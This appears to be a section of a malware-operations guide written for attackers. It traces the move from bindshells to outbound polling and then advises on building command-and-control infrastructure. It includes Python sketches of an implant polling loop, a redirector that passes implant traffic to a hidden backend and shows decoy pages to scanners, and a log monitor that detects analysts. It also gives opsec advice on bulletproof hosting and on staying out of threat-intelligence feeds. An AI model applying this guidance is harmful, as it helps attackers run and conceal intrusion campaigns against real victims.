With the proliferation of connection firewalling (hardware and software), data filtering, and government mandates, managing compromised devices forced campaign tactics to shift toward indirect methods of communicating with implanted code. Operating system vendors saw their products owned through remotely exploitable services listening on every device by default, giving way to massive worms that caused widespread internet outages and, in the worst cases, outright network destruction; the fallout forced vendors to take serious looks at security. The “bindshell” is an archaic relic of times past.
Malware authors frequently demonstrated, or used, “bindshell” payloads to provide operational functionality post-exploitation. The bindshell was the proof of an exploit’s success, the finish line of a successful exploitation exercise. Several critical vulnerabilities, and their automated exploitation by worms and aggressive scanners, would close the chapter on this technique in hacker history.
The DCOM vulnerability behind MS Blaster, found and demonstrated publicly by the LSD group out of Poland, led to perhaps the most lucrative environment the world has ever publicly seen (and may ever see) in the entirety of the internet’s existence, counting connected machines per capita during the period.
Practically every NT-based operating system connected to a network was exploitable, up to and including the then-latest Windows XP (SP1).
Many ISPs and institutions around the world had open network policies. The landscape was littered with hundreds of millions of NetBIOS-accessible machines across the Internet. It was a slaughterhouse; even power plants (on the US East Coast) were probably affected by these attacks.
The remedy was the abrupt closure of ALL ports to clients’ public and private IP addresses in many ISP walled gardens. Organizations rapidly pushed restrictive firewall policies onto internal and external network segments. Many had to learn the lesson the hard way.
It was both a joyous time for hackers and a solemn moment as everyone realized things would never be the same after this.
Microsoft policy, which had always treated security as an afterthought in the software creation process, changed overnight; the company acknowledged its role in proactively debugging its code to prevent worldwide device compromise.
No longer would your SubSeven or BO backdoor work. The game was raised. Malware authors had to change their tactics at a basic design level. Calling into a target’s network was no longer an option for most operations.
As with most other applications, malware began to rely on polling to receive updates and accept commands, as sketched below.
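To make the shift concrete, here is a minimal sketch of the outbound polling pattern, assuming a hypothetical check-in URL and a plain-text task response; real implants wrap this in encryption, jitter, and protocol mimicry.

```python
import time
import urllib.request

# Hypothetical check-in endpoint; a real deployment would sit behind the
# redirector/CDN layers discussed later in this section.
POLL_URL = "https://example.com/updates"
POLL_INTERVAL = 300  # seconds between check-ins

def poll_once():
    """Ask the server for pending work; return None when there is nothing to do."""
    try:
        with urllib.request.urlopen(POLL_URL, timeout=10) as resp:
            body = resp.read().decode()
            return body or None
    except OSError:
        return None  # outbound failures are expected; just try again later

def main():
    while True:
        task = poll_once()
        if task:
            print("received task:", task)  # placeholder for actual task handling
        time.sleep(POLL_INTERVAL)

if __name__ == "__main__":
    main()
```

The point is the direction of the connection: the compromised host initiates everything outbound over an allowed protocol, so no listening port is ever required.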
C2 management is often powered by a traditional web stack:
- HTTP Server
- (Optional) Load Balancer(s)
- (Optional) Content Delivery Network(s)
- (Optional) Redirector(s) (see the sketch following this list)
- DB Mechanism (does not always have to be a server, although it probably should be)
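As a rough illustration of how the redirector layer above might behave, the following sketch accepts requests carrying a hypothetical shared header and proxies them to an invented backend C2 address, while everything else receives a decoy page. In practice this layer is usually built from nginx/Apache rewrite rules or cloud services rather than a hand-rolled server.

```python
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical values: the backend address and the header implants send
# are operation-specific and only stand in for the real thing here.
BACKEND = "http://10.0.0.5:8080"
EXPECTED_HEADER = "X-Session"
DECOY_PAGE = b"<html><body>Under construction</body></html>"

class Redirector(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.headers.get(EXPECTED_HEADER):
            # Looks like an implant check-in: relay it to the backend C2.
            try:
                with urllib.request.urlopen(BACKEND + self.path, timeout=10) as resp:
                    self.send_response(resp.status)
                    self.end_headers()
                    self.wfile.write(resp.read())
            except OSError:
                self.send_error(502)
        else:
            # Scanners, crawlers, and curious analysts get a boring decoy.
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(DECOY_PAGE)

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), Redirector).serve_forever()
```

Keeping the filtering logic on disposable front-end hosts means the backend server, the database, and the operators behind them never see unvetted traffic directly.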
How these are designed, configured, deployed, and protected is up to the operation’s infrastructure leader(s), ideally with input from people who have significant backgrounds in systems administration and networking.
For a sophisticated group planning multiple extended campaigns over its existence, it is worth spending significant resources on building out and maintaining this infrastructure.
There are cases in which an attacker may use a barebones infrastructure. Standalone or all-in-one C2 packages are rarely seen in the wild.
In the case of a solo adventure, it is still best to separate your infrastructure as much as possible. CI/CD methodology has come a long way since the early 2000s and continues to improve; with proper scripting experience, a single operator can manage quite a lot of infrastructure. Maintaining relationships with the right “bulletproof” hosting providers becomes the harder problem to solve.
One must take into account the OpSec needed for any operations carried out via this infrastructure. Proper documentation and monitoring of this infrastructure are needed, all the more so if one is forgetful. For teams, it is imperative to have this information ready for anyone who needs to know.
One must also take into account threat information shared within the defensive community. Threat Intelligence feeds often publish details of campaigns that researchers and vendors have come across, in an effort to increase their reputation and interest in their products. By limiting your campaign activities to the fewest targets possible, you can minimize your exposure to such organizations. Despite the utmost care, your activities always have some possibility of exposure; thus, if possible, routinely search public news and search engine sources for your targets showing up.
The more advanced organizations may have access to defensive teams subscribed to commercial, public, or private threat sharing information sources. These can prove invaluable for protecting the unit as a whole.
Log management, as with any well-monitored service, is a key responsibility. It is the more important of the two tasks if you lack the resources to monitor both Threat Intelligence feeds and your server logs. A paranoid malware author will have mechanisms in place to detect odd traffic patterns in C2 logs (a brief sketch follows this list):
- Headers not normally seen
- HTTP verbs your implants do not use (not counting GET)
- HTTP variables your implants do not use (on any verb that accepts arbitrary input)
- Non-HTTP-compliant traffic sent to HTTP services
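A minimal sketch of that kind of check, assuming a standard combined-format access log and hypothetical allowlists for the verbs, paths, and user agents your implants actually send:

```python
import re

# Hypothetical allowlists: whatever your implants legitimately send.
EXPECTED_VERBS = {"GET"}
EXPECTED_PATHS = {"/updates", "/news.php"}
EXPECTED_AGENTS = {"Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}

# Combined log format: ip - - [time] "VERB /path HTTP/x.x" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<verb>\S+) (?P<path>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)

def find_anomalies(log_path):
    """Yield (reason, raw line) pairs for entries that do not match the expected pattern."""
    with open(log_path) as fh:
        for line in fh:
            m = LINE_RE.match(line)
            if not m:
                yield ("non-HTTP or malformed request", line.rstrip())
                continue
            if m["verb"] not in EXPECTED_VERBS:
                yield ("unexpected verb " + m["verb"], line.rstrip())
            elif m["path"].split("?")[0] not in EXPECTED_PATHS:
                yield ("unexpected path " + m["path"], line.rstrip())
            elif m["agent"] not in EXPECTED_AGENTS:
                yield ("unexpected user agent", line.rstrip())

if __name__ == "__main__":
    for reason, raw in find_anomalies("access.log"):
        print(reason, "->", raw)
```

The same idea extends to header sets and request bodies: anything your implants never emit, but which shows up in the logs, deserves attention.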
Repeat the logic as necessary for whichever protocol you use for C2 communications. Due to current firewall policies across nations and organizations, HTTP(S) is used in some form for most communication. The internet will keep changing, but the underlying principles will not.